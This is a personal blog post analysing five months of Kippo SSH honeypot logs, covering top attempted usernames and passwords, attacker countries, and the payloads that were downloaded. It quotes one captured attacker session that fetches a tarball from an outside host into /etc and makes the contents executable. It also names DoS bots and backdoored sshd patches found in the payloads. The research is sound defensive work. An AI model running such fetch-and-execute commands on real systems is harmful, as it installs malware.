Over a year has now passed since I started playing with the Kippo honeypot, so a quick second post about my findings is long overdue!

I ran Kippo on an overpriced cheap VPS with two-IPs pretty much continuously from between April and September 2013. That’s 5 months (154 days). I wrote a short post near the beginning of that time. In my original post on this subject I waffled a bit about how almost all of the attacking traffic I saw was from Chinese IPs and mentioned a few attempted passwords with high entropy. In this post I want to summarise what I saw over the full 5 month period.


First, credentials. The honeypot was configured with a single user account root and the password 123456.

In the time the honeypot was running, I logged 71,264 login attempts – about 463 per day (not all that many, really), and of those attempts 395 were successful.

The most attempted username was root, and sorted by number of attempts, the top ten usernames were:

    44193 root
      819 bin
      657 test
      554 oracle
      343 nagios
      240 user
      227 postgres
      189 guest
      187 admin
      157 apache

It’s interesting that oracle, nagios and postgres all appear more frequently than apache or www-data (which is even further down the list). Could these indicate a general lack of good security practices on some database and monitoring servers? In that case, where’s MySQL?

Counts of password attempts were spread more evenly than usernames, and the most attempted passwords were changeme, 123456 and password. The list below shows the top ten:

    1661 changeme
    1475 123456
    1023 password
     930 1234
     839 abc123
     627 test
     599 12345
     420 123
     327 qwerty
     227 111111

This really has to be about the worst possible wordlist. In all, the logs contain login attempts with 6,122 distinct usernames and 18,561 different passwords.

Strange credentials

I wrote about some of the higher entropy passwords in my last post, highlighting a few of the more interesting strings, but this time some were even more strange.

Some of the password strings with the highest entropy, according to Data::Password::Entropy are:


Bizarre! I find it hard to believe that real-life systems are compromised using these passwords, so I suspect that as I said in my previous post they’re either set by other tools, or perhaps they’re some sort of strange meme which is gradually propagating through script kiddie’s word lists.

I also find the idea that they’re ‘vanity strings’ unlikely, but like the idea that there are thousands of Chinese script kiddies running SSH scanners solely to get into geek’s blog posts.

Attacker’s IPs

As before, Chinese IPs are dominant, but there’s also a significant amount of traffic from South America and from cheap hosting companies elsewhere. Here’s a list of the top ten individual IPs and country information:

    7129  China
    2978    China
    2230  China
    2153    China
    2153      Brazil
    2150    Germany
    1883    Chile
    1847   Japan
    1556   China
    1438     China

I don’t think there’s anything surprising there.

Downloads & Sessions

There wasn’t much download activity, which is interesting and probably indicates that lots of SSH scanners just run unattended on large blocks and their owners check the results later. Or it could indicate a lack of realism in my honeypot setup.

Over the entire time the honeypot was running there were 25 downloads in total. Most of these were tarballs of scanning tools, but four of the 25 were cachefly test files and Microsoft service packs. In these cases I think the attackers were probably intending to use the system in DoS attacks, and were using the big downloads to judge available bandwidth.

Here’s an example terminal session:

wget http://cachefly.cachefly.net/100mb.test
cd /etc; wget http://rootnr1.net76.net/shell.tgz; tar xvf shell.tgz; rm -rf shell.tgz; cd rc.9; chmod +x *

… at this point kippo starts playing games with the user and they invariably log off but I still have the files to play with. In this case, the payload contains several shell and perl scripts and a lot of pre-compiled binaries, all of which are unpacked into a directory called rc.9.

The perl scripts include Hawker Hunter v2.0, an IRC bot with port scanning and DoS capabilities and another DoS tool which contains the string “GlobaL Team atack victim” (sic).

Running strings on the binaries reveals some interesting, if dated things. For example, one of the files h contains:

Hide - Process Faker, by Schizoprenic Xnuxer Research (c) 2002

And another stream contains:

stream.c v1.0 - TCP Packet Storm

Which, according to this mailing list post from 2000 might exploit an old DoS vulnerability in FreeBSD, Solaris and Linux. It’s not clear to me if this is still relevant on modern systems, and if not this payload could have been around for ages. In fact, one of the most noticeable aspects of the payloads I saw was their age; everything’s old!.

Shall we play a game?

Other payloads I saw included a couple of backdoored SSH daemons, one of which includes the amazingly named openssh-3.6.1p2-backdoor.patch, and a few different IRC bots and bouncers, such as PyBNC.

The contents of these other downloads are interesting enough to be the subject of another post (in another year?!), so I’ll leave with this recorded terminal session: